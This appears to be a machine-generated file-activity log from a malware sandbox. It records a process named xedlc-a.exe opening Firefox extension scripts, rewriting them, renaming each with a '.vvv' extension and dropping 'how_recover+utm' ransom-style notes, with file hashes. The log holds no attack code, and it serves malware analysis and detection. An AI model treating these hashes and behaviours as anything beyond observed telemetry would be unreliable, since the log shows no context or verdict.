- fid (ads:): 562949953476245
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 83524
- mode: open
- sequenceNumber: 1323
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\utils\registry.js
- filesize: 3318
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953476263
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 83646
- mode: close
- sequenceNumber: 1324
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\utils\registry.js
- filesize: 3742
- md5sum: 5926888a5e937b28193481ce57dd7707
- sha1sum: f176266a95fb58411e0c94dd0220515537b38ef2
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953476263
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 83660
- mode: rename
- sequenceNumber: 1325
- filesize: 3742
- md5sum: 5926888a5e937b28193481ce57dd7707
- sha1sum: f176266a95fb58411e0c94dd0220515537b38ef2
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\utils\registry.js
- new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\utils\registry.js.vvv
- ads:
- fid (ads:): 562949953476263
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 83672
- mode: open
- sequenceNumber: 1326
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\utils\thumbnail.js
- filesize: 3099
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976765915
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 83681
- mode: close
- sequenceNumber: 1327
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\utils\thumbnail.js
- filesize: 3518
- md5sum: 6a3b3130f0daa44d32b17e58d8b06c5d
- sha1sum: f38909635b22d3234466110c72c8afa3dc115990
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976765915
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 83694
- mode: rename
- sequenceNumber: 1328
- filesize: 3518
- md5sum: 6a3b3130f0daa44d32b17e58d8b06c5d
- sha1sum: f38909635b22d3234466110c72c8afa3dc115990
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\utils\thumbnail.js
- new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\utils\thumbnail.js.vvv
- ads:
- fid (ads:): 281474976765915
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 83708
- mode: created
- sequenceNumber: 1329
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\utils\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778355
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 83715
- mode: close
- sequenceNumber: 1330
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\utils\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778355
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 83728
- mode: created
- sequenceNumber: 1331
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\utils\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778356
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 83737
- mode: close
- sequenceNumber: 1332
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\utils\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778356
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 83746
- mode: open
- sequenceNumber: 1333
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\window-utils.js
- filesize: 6368
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976765909
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 83790
- mode: close
- sequenceNumber: 1334
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\window-utils.js
- filesize: 6798
- md5sum: f04a88d6800352280b581ce7edf64087
- sha1sum: 4734401189d520801160287ddc001893ce72afc1
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976765909
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 83805
- mode: rename
- sequenceNumber: 1335
- filesize: 6798
- md5sum: f04a88d6800352280b581ce7edf64087
- sha1sum: 4734401189d520801160287ddc001893ce72afc1
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\window-utils.js
- new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\window-utils.js.vvv
- ads:
- fid (ads:): 281474976765909
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 83820
- mode: open
- sequenceNumber: 1336
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\windows\dom.js
- filesize: 2259
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953476258
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 83831
- mode: close
- sequenceNumber: 1337
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\windows\dom.js
- filesize: 2686
- md5sum: eee2f8685fce8448e64ba55ccefe2598
- sha1sum: 330b0594fc36e73bfe579c307821b61310502844
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953476258
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 83846
- mode: rename
- sequenceNumber: 1338
- filesize: 2686
- md5sum: eee2f8685fce8448e64ba55ccefe2598
- sha1sum: 330b0594fc36e73bfe579c307821b61310502844
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\windows\dom.js
- new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\windows\dom.js.vvv
- ads:
- fid (ads:): 562949953476258
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 83860
- mode: open
- sequenceNumber: 1339
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\windows\loader.js
- filesize: 5598
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976765896
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 83881
- mode: close
- sequenceNumber: 1340
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\windows\loader.js
- filesize: 6014
- md5sum: 47615eaeda675d2422d565610c2995fd
- sha1sum: 0db4122fdec2bab30996d24ad557272dae5664b1
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976765896
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 83894
- mode: rename
- sequenceNumber: 1341
- filesize: 6014
- md5sum: 47615eaeda675d2422d565610c2995fd
- sha1sum: 0db4122fdec2bab30996d24ad557272dae5664b1
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\windows\loader.js
- new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\windows\loader.js.vvv
- ads:
- fid (ads:): 281474976765896
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 83906
- mode: open
- sequenceNumber: 1342
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\windows\observer.js
- filesize: 3435
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976765863
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 83945
- mode: close
- sequenceNumber: 1343
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\windows\observer.js
- filesize: 3854
- md5sum: 9d38c2a0178132c20f0018dbbd121518
- sha1sum: 2c69170584efb3b758aa6b2f5019711dd41d5434
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976765863
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 84024
- mode: rename
- sequenceNumber: 1344
- filesize: 3854
- md5sum: 9d38c2a0178132c20f0018dbbd121518
- sha1sum: 2c69170584efb3b758aa6b2f5019711dd41d5434
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\windows\observer.js
- new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\windows\observer.js.vvv
- ads:
- fid (ads:): 281474976765863
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 84038
- mode: open
- sequenceNumber: 1345
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\windows\tabs.js
- filesize: 7916
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976765901
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 84205
- mode: close
- sequenceNumber: 1346
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\windows\tabs.js
- filesize: 8334
- md5sum: b0d79b49e72e8a8fe80600af7f07e93e
- sha1sum: 10d5cc4ed82b3a727097d4b486c629d669db93ee
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976765901
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 84218
- mode: rename
- sequenceNumber: 1347
- filesize: 8334
- md5sum: b0d79b49e72e8a8fe80600af7f07e93e
- sha1sum: 10d5cc4ed82b3a727097d4b486c629d669db93ee
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\windows\tabs.js
- new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\windows\tabs.js.vvv
- ads:
- fid (ads:): 281474976765901
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 84233
- mode: created
- sequenceNumber: 1348
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\windows\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778357
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 84241
- mode: close
- sequenceNumber: 1349
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\windows\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778357
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 84251
- mode: created
- sequenceNumber: 1350
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\windows\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778358
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 84259
- mode: close
- sequenceNumber: 1351
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\windows\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778358
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 84268
- mode: open
- sequenceNumber: 1352
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\xhr.js
- filesize: 6332
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976765888
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 84312
- mode: close
- sequenceNumber: 1353
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\xhr.js
- filesize: 6750
- md5sum: 2f705391b457fa09ce0b6b02c980d294
- sha1sum: 96a21397a639539c8dc5ed5cb2ef58a91fea54c3
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976765888
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 84324
- mode: rename
- sequenceNumber: 1354
- filesize: 6750
- md5sum: 2f705391b457fa09ce0b6b02c980d294
- sha1sum: 96a21397a639539c8dc5ed5cb2ef58a91fea54c3
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\xhr.js
- new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\xhr.js.vvv
- ads:
- fid (ads:): 281474976765888
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 84336
- mode: open
- sequenceNumber: 1355
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\xpcom.js
- filesize: 4999
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976765905
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 84468
- mode: close
- sequenceNumber: 1356
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\xpcom.js
- filesize: 5422
- md5sum: 0505f3ee1e0924b22ee22412b053424f
- sha1sum: 192be001cb2cf1b0f68971a21a615f2d5437b560
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976765905
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 84480
- mode: rename
- sequenceNumber: 1357
- filesize: 5422
- md5sum: 0505f3ee1e0924b22ee22412b053424f
- sha1sum: 192be001cb2cf1b0f68971a21a615f2d5437b560
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\xpcom.js
- new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\xpcom.js.vvv
- ads:
- fid (ads:): 281474976765905
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 84492
- mode: open
- sequenceNumber: 1358
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\xul-app.js
- filesize: 3654
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976765904
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 84543
- mode: close
- sequenceNumber: 1359
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\xul-app.js
- filesize: 4078
- md5sum: e1b11f64a09be41239a6aadfb9af0c73
- sha1sum: 84b4d7f62b63de7823873f5bbaa76ab188ed214b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976765904
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 84555
- mode: rename
- sequenceNumber: 1360
- filesize: 4078
- md5sum: e1b11f64a09be41239a6aadfb9af0c73
- sha1sum: 84b4d7f62b63de7823873f5bbaa76ab188ed214b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\xul-app.js
- new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\xul-app.js.vvv
- ads:
- fid (ads:): 281474976765904
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 84567
- mode: created
- sequenceNumber: 1361
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778359
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 84575
- mode: close
- sequenceNumber: 1362
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778359
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 84584
- mode: created
- sequenceNumber: 1363
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
